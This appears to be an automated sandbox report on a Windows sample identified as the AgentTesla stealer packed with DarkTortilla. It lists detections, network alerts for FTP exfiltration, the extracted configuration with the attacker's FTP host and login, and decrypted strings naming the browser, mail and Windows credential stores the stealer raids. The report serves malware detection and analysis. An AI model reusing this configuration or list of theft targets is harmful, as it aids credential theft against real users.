Edit tour

Windows Analysis Report
wva4mZuUb4.exe

Overview

General Information

Sample name:	wva4mZuUb4.exe renamed because original name is a hash value
Original sample name:	872f1970c19bbf2031fe43f9ed034f1edd2763e6ecda2de368336da3312d8463.exe
Analysis ID:	1569286
MD5:	c6ad6edfa92898ce230177f0ecb4890c
SHA1:	49b4e85cbf95afab5be60b3272370886418d64e9
SHA256:	872f1970c19bbf2031fe43f9ed034f1edd2763e6ecda2de368336da3312d8463
Tags:	exeuser-adrian__luca
Infos:

Detection

AgentTesla, DarkTortilla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected DarkTortilla Crypter

.NET source code contains method to dynamically call methods (often used by packers)

AI detected suspicious sample

Allocates memory in foreign processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses FTP

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

wva4mZuUb4.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\wva4mZuUb4.exe" MD5: C6AD6EDFA92898CE230177F0ECB4890C)

InstallUtil.exe (PID: 2436 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
DarkTortilla	DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging.From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.	No Attribution	https://www.secureworks.com/research/darktortilla-malware-analysis	https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1921308010.0000000003FF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0000000A.00000002.2491018423.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.1921308010.0000000003F20000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.1921308010.0000000003DA9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
00000000.00000002.1922738564.00000000055F0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
00000000.00000002.1909018822.0000000002DA1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2494018883.0000000002E51000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: wva4mZuUb4.exe PID: 7312	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
Process Memory Space: wva4mZuUb4.exe PID: 7312	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 2436	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 2436	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
decrypted.memstr	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
decrypted.memstr	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
0.2.wva4mZuUb4.exe.401b818.2.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.wva4mZuUb4.exe.3f9dfba.1.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.wva4mZuUb4.exe.3f744ea.3.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.wva4mZuUb4.exe.3f4aa0a.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.wva4mZuUb4.exe.3ff153a.4.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.wva4mZuUb4.exe.401b818.2.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
10.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.wva4mZuUb4.exe.3f9dfba.1.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.wva4mZuUb4.exe.3f744ea.3.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.wva4mZuUb4.exe.3ff153a.4.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
0.2.wva4mZuUb4.exe.55f0000.5.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.wva4mZuUb4.exe.55f0000.5.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	JoeSecurity_AgentTesla_2	Yara detected AgentTesla	Joe Security
Click to see the 8 entries

Suricata Signatures

ET MALWARE AgentTesla Exfil via FTP

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:29:52.838168+0100	2029927	1	A Network Trojan was detected	192.168.2.7	49835	162.241.203.30	21	TCP

ETPRO MALWARE Agent Tesla CnC Exfil Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-05T17:29:53.773083+0100	2855542	1	A Network Trojan was detected	192.168.2.7	49846	162.241.203.30	44938	TCP
2024-12-05T17:29:53.893896+0100	2855542	1	A Network Trojan was detected	192.168.2.7	49846	162.241.203.30	44938	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: wva4mZuUb4.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://aminhacorretora.com.br	Avira URL Cloud: Label: malware
Source: http://ftp.aminhacorretora.com.br	Avira URL Cloud: Label: malware

Found malware configuration

Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}

Multi AV Scanner detection for submitted file

Source: wva4mZuUb4.exe

ReversingLabs: Detection: 71%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: wva4mZuUb4.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: /log.tmp
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: .html
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <html>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </html>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: .html
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <html>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </html>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br>[
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: yyyy-MM-dd HH:mm:ss
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ]<br>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: .html
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: yyyy_MM_dd_HH_mm_ss
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: .zip
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Time:
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br>User Name:
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br>Computer Name:
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br>OSFullName:
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br>CPU:
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br>RAM:
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: IP Address:
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <hr>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: New
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: MM/dd/yyyy HH:mm:ss
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: IP Address:
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: false
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: false
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: false
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: false
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: false
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: true
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: false
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ftp://ftp.aminhacorretora.com.br
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: logsftp@aminhacorretora.com.br
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: _yA=,M5*J?KH
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: false
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: false
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: appdata
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: XVWmeW
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: XVWmeW.exe
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: XVWmeW
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Type
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <hr>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <b>[
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ]</b> (
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: )<br>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {BACK}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {ALT+TAB}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {ALT+F4}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {TAB}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {ESC}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {Win}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {CAPSLOCK}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {KEYUP}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {KEYDOWN}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {KEYLEFT}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {KEYRIGHT}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {DEL}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {END}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {HOME}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {Insert}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {NumLock}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {PageDown}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {PageUp}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {ENTER}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F1}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F2}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F3}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F4}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F5}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F6}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F7}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F8}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F9}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F10}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F11}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {F12}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: control
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: {CTRL}
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: &
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: >
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: "
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <br><hr>Copied Text: <br>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <hr>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: logins
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: IE/Edge
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Windows Secure Note
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Windows Web Password Credential
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Windows Credential Picker Protector
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Web Credentials
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Windows Credentials
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Windows Domain Certificate Credential
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Windows Domain Password Credential
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Windows Extended Credential
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: 00000000-0000-0000-0000-000000000000
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SchemaId
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: pResourceElement
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: pIdentityElement
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: pPackageSid
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: pAuthenticatorElement
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: IE/Edge
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: UC Browser
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: UCBrowser\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Login Data
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: journal
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: wow_logins
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Safari for Windows
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Apple Computer\Preferences\keychain.plist
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <array>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <dict>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <string>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </string>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <string>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </string>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: <data>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: </data>
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: -convert xml1 -s -o "
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \fixed_keychain.xml"
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Microsoft\Credentials\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Microsoft\Protect\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: credential
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: QQ Browser
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Tencent\QQBrowser\User Data
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Default\EncryptedStorage
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Profile
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \EncryptedStorage
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: entries
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: category
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Password
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: str3
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: str2
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: blob0
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: password_value
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: IncrediMail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: PopPassword
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\IncrediMail\Identities\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Accounts_New
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: PopPassword
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SmtpPassword
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SmtpServer
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: EmailAddress
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Eudora
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Software\Qualcomm\Eudora\CommandLine\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: current
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Settings
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: SavePasswordText
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Settings
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ReturnAddress
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: Falkon Browser
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \falkon\profiles\
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: profiles.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: startProfile=([A-z0-9\/\.\"]+)
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: profiles.ini
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \browsedata.db
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: autofill
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: ClawsMail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \Claws-mail
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \clawsrc
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \clawsrc
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: passkey0
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: master_passphrase_salt=(.+)
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: master_passphrase_pbkdf2_rounds=(.+)
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: \accountrc
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: smtp_server
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: address
Source: 0.2.wva4mZuUb4.exe.3f4aa0a.0.raw.unpack	String decryptor: account
